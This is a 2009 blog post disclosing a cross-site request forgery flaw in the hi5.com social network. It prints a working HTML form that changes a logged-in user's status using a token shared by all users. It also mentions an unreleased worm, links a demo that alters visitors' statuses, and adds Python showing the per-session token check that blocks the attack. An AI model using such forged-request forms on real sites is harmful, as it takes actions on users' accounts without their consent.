hi5.com CSRF (Special Demo)

2009-05-09 19:05:00

It's that time again for me to rant about poor web security by giving full disclosure.

hi5.com is some generic, childish social networking site that is extremely popular around the world, about Alexa #15 worldwide.

I was dicking with this site and found that the status message is updated by AJAX, and had a validation token that is the same for every user, and only changes every day at midnight.

I smelled CSRF.

So, I put together This CSRF Demo (do not click unless you want your status changed to 'This is a CSRF demonstration by humanbagel.com') to test it.

It worked.

A simple CSRF exploit, source code is:

<form action="http://hi5.com/friend/profile/editScrapbookTopicAjax.do" method="post">
  <input type="hidden" name="editorId" value="topic">
  <!-- "js" is the anti-CSRF token: identical for every user and rotated only at midnight, so it protects nothing -->
  <input type="hidden" name="js" value="aLy1t5zU0Ywg">
  <input type="hidden" name="source" value="profile">
  <input type="hidden" name="topic" value="This is a CSRF demonstration by humanbagel.com">
</form>

Simple CSRF.
There are far worse CSRF exploits on the site, including a nice AJAX worm I wrote, but I may include that data in a later post.
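How the server side should have handled this, as an added example that is not hi5's code (the real backend is not visible here): the shared daily token described above, modelled beside a per-session random token and the check the status endpoint should run. The session store, the site secret and all helper names are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# --- Weak scheme, modelled on the behaviour described in the post --------
# Assumption (constructed): the token depends only on the current date, so
# every user receives the same value and it stays valid until midnight.
SITE_SECRET = b"constructed-site-secret"


def weak_daily_token(day_iso: str) -> str:
    """Token shared by all users for one calendar day (e.g. '2009-05-09')."""
    mac = hmac.new(SITE_SECRET, day_iso.encode(), hashlib.sha256)
    return mac.hexdigest()[:12]


def weak_verify(day_iso: str, submitted: str) -> bool:
    """Accepts any request carrying today's value, whoever sends it."""
    return hmac.compare_digest(weak_daily_token(day_iso), submitted)


# --- Hardened scheme: unguessable token bound to one session -------------
class SessionStore:
    """Minimal in-memory session store, constructed for this example."""

    def __init__(self) -> None:
        self._csrf: Dict[str, str] = {}

    def issue_token(self, session_id: str) -> str:
        # 256 bits of randomness, one per session, rotated on each login.
        token = secrets.token_urlsafe(32)
        self._csrf[session_id] = token
        return token

    def verify_token(self, session_id: str, submitted: Optional[str]) -> bool:
        expected = self._csrf.get(session_id)
        if expected is None or submitted is None:
            return False
        # Constant-time comparison so the token cannot be guessed byte by byte.
        return hmac.compare_digest(expected, submitted)


def handle_status_update(store: SessionStore, session_id: str, form: dict):
    """The check a status-update handler should run before changing state."""
    if not store.verify_token(session_id, form.get("js")):
        return 403, "CSRF token missing or invalid"
    return 200, "status set to %r" % form["topic"]
```

A cross-site form can still carry the victim's cookies, but it cannot read the victim's session-bound token, so the forged submission fails at the 403 while the legitimate page, which embeds the token, succeeds.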

I reported the issue; they never fixed it, so I'm reporting it here.

Here is the demo (do not click unless you want your status changed to 'This is a CSRF demonstration by humanbagel.com').
